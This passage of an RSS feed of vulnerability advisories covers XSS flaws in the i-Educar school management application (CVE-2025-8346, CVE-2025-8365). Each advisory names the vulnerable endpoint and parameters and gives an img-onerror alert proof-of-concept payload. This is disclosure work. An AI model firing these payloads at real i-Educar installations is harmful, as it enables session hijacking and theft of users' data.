&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  https://localhost/intranet/educar_aluno_lst.php?ref_cod_matricula=&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;20src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x%20onerror=alert(%27CVE-Hunters%27)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8346-cross-site-scripting-xss-reflected-endpoint-educar_aluno_lstphp-via-ref_cod_matricula-parameter&amp;#34;&amp;gt;CVE-2025-8346: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; via &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt; parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8346&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_aluno_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;ref_cod_matricula&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVE&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Hunters&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8346/image.png&amp;#34;
	width=&amp;#34;2226&amp;#34;
	height=&amp;#34;1408&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8346/image_hu_4ad20b410643cee4.png 480w, /p/cve-2025-8346/image_hu_8466039bf764aed0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;379px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;full-payload&amp;#34;&amp;gt;Full Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  https://localhost/intranet/educar_aluno_lst.php?ref_cod_matricula=&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;20src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x%20onerror=alert(%27CVE-Hunters%27)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8346.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8365</title>
        <link>https://www.cvehunters.com/p/cve-2025-8365/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8365/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8365-multiples-cross-site-scripting-xss-stored-in-endpoint-atendidos_cadphp&amp;#34;&amp;gt;CVE-2025-8365: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8365-multiples-cross-site-scripting-xss-stored-in-endpoint-atendidos_cadphp&amp;#34;&amp;gt;CVE-2025-8365: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8365&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;atendidos_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;nome_social&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;email&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8365/image.png&amp;#34;
	width=&amp;#34;1229&amp;#34;
	height=&amp;#34;332&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8365/image_hu_cfca56083774b524.png 480w, /p/cve-2025-8365/image_hu_3fab16a5d252a9b8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter nome&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;370&amp;#34;
		data-flex-basis=&amp;#34;888px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8365/image-1.png&amp;#34;
	width=&amp;#34;1208&amp;#34;
	height=&amp;#34;350&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8365/image-1_hu_4f88faef3bff0085.png 480w, /p/cve-2025-8365/image-1_hu_a097317291baef5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter nome_social&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;828px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8365/image-2.png&amp;#34;
	width=&amp;#34;1229&amp;#34;
	height=&amp;#34;342&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8365/image-2_hu_23eddbd5b1dbebb0.png 480w, /p/cve-2025-8365/image-2_hu_7c7b2bc555309126.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter email&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;359&amp;#34;
		data-flex-basis=&amp;#34;862px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8365.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8366</title>
        <link>https://www.cvehunters.com/p/cve-2025-8366/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8366/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8366-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_servidor_lstphp&amp;#34;&amp;gt;CVE-2025-8366: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_servidor_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8366&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
